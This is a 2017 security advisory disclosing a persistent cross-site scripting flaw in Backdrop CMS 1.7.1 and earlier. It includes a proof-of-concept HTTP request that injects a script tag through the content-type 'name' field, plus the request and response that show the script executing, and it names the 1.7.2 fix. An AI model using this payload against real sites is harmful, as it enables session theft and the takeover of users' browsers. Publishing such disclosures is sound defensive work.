=============================================
MGC ALERT 2017-005
- Original release date: July 11, 2017
- Last revised:  August 18, 2017
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting

II. BACKGROUND
-------------------------
Backdrop CMS is a simple, lightweight, and easy to use Content Management
System used to build attractive, professional websites.

III. DESCRIPTION
-------------------------
Has been detected a Persistent XSS vulnerability in Backdrop CMS, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.

IV. PROOF OF CONCEPT
-------------------------
Go to: Structure -> Content types -> Add content type

And post:

POST /backdrop/admin/structure/types/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
Referer: http://127.0.0.1/backdrop/admin/structure/types/add
Cookie: Backdrop.tableDrag.showWeight=0;
PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en;
phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa;
nv4_cltz=120.60.120%257C%252F%257C;
nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D;
nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C;
gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0;
gnew_language=english; gnew_template=clean;
SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo
Connection: close
Upgrade-Insecure-Requests: 1

name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&type=test_script_alert&description=&title_label=Demo&help=&status_default=1&sticky_enabled=1&promote_enabled=1&path_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D&revision_enabled=1&node_submitted=1&node_user_picture=1&comment_default=2&comment_per_page=50&comment_mode=1&comment_user_picture=1&comment_form_location=1&comment_preview=1&additional_settings__active_tab=&form_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA&form_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4&form_id=node_type_form&op=Save+and+add+fields

The variable "name" it is not sanitized, later, if you go to the content
type created and click in "Manage Displays"

GET /backdrop/admin/structure/types/manage/test-script-alert/display
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101
Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate

The XSS is executed, in the response you can view:

Manage display</a></li></ul></div></div></td> </tr><tr class="header
even"><td>Customized for test"><script>alert(/XSS/)</script></td><td
class="priority-low"></td><td></td> </tr>

V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Backdrop CMS <= 1.7.1

VII. SOLUTION
-------------------------
Install the last release:
https://github.com/backdrop/backdrop/releases/tag/1.7.2

VIII. REFERENCES
-------------------------
https://backdropcms.org/security/backdrop-sa-core-2017-009

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
July 11, 2017 1: Initial release
August 18, 2017 2: Last revision

XI. DISCLOSURE TIMELINE
-------------------------
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
July 11, 2017 2: Send to vendor
August 17, 2017 3: Vendo fix in 1.7.2 version
August 18, 2017 4: Sent to lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester